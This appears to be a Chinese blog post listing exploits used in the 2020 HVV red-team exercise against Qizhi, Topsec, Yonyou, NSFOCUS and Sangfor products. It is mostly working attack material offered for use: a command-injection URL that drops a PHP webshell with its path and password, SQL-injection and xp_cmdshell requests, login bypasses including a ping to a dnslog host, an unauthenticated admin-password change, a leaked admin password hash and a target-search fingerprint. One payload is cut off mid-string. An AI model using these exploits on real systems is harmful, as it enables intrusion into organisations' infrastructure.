2020HVV中的漏洞

一、齐治堡垒机前远程命令执行漏洞（CNVD-2019-20835）

1、访问 http://10.20.10.11/listener/cluster_manage.php :返回 “OK”.（未授权无需登录）

2、访问如下链接即可获得getshell，执行成功后，生成PHP一句话马

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}” ZWNobyAnPD9waHAgQGV2YW

3.getshell访问路径：

/var/www/shterm/resources/qrcode/lbj77.php

https://10.20.10.10/shterm/resources/qrcode/lbj77.php(密码10086)

据说还是另外一个版本是java的:

1 2	POST /shterm/listener/tui_update.php a=["t';import os;os.popen('whoami')#"]

二、天融信TopApp-LB 负载均衡系统Sql注入漏洞

1.利用POC:

POST /acc/clsf/report/datasource.php HTTP/1.1
Host: localhost
Connection: close
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
t=l&e=0&s=t&l=1&vid=1+union select 1,2,3,4,5,6,7,8,9,substr('a',1,1),11,12,13,14,15,16,17,18,19,20,21,22-- +&gid=0&lmt=10&o=r_Speed&asc=false&p=8&lipf=&lipt=&ripf=&ript=&dscp=&proto=&lpf=&lpt=&rpf=&rpt=@。。

2.2个历史漏洞仍然可以复现。

https://www.uedbox.com/post/21626/

用户名随意密码：;id（天融信负载均衡TopApp-LB系统无需密码直接登陆）

https://www.uedbox.com/post/22193/

用户名: ; ping 9928e5.dnslog.info; echo 密码：任意

三、用友GRP-u8 注入

利用POC:

POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
Host: localhost
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT> <R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

四、绿盟UTS综合威胁探针管理员任意登录

逻辑漏洞,利用方式参考：https://www.hackbug.net/archives/112.html

1、修改登录数据包 {“status”:false,”mag”:””} -> {“status”:true,”mag”:””}

2、/webapi/v1/system/accountmanage/account接口逻辑错误泄漏了管理员的账户信息包括密码（md5）

3、再次登录,替换密码上个数据包中md5密码

4、登录成功

漏洞实际案例：

对响应包进行修改，将false更改为true的时候可以泄露管理用户的md5值密码

利用渠道的md5值去登录页面

7ac301836522b54afcbbed714534c7fb

五、天融信数据防泄漏系统越权修改管理员密码

无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd，接口未授权访问,造成直接修改任意用户密码，默认superman账户uid为1

1
2
3

POST /?module=auth_user&action=mod_edit_pwd
Cookie: username=superman;
uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

六、WPS Office 图片解析错误导致堆损坏，任意代码执行

看上去(算了看不懂… ,漏洞利用可能导致拒绝服务。

七、SANGFOR终端检测响应平台-任意用户登录

fofa指纹：title=”SANGFOR终端检测响应平台”

漏洞利用：

payload：

https://ip/ui/login.php?user=需登录的用户名

列如：

https://1.1.1.1:1980/ui/login.php?user=admin

查询完毕以后即可登录平台。

八、某信服EDR漏洞-包含payload

**
**

1.漏洞利用方法：

https://xxx.xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami

2.批量利用方法

网上已经放出批量利用方法了，如下：https://github.com/A2gel/sangfor-edr-exploit
想读更多内容？请进hyck的知识星球查看，内容太多，淦
2020HVV中的漏洞.doc

上传：hyck 7.64 MB 2020/11/29

XRSec has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all contents such as copyright notice. Without the permission of the author, the content of this article shall not be modified or increased or decreased arbitrarily, and it shall not be used for commercial purposes in any way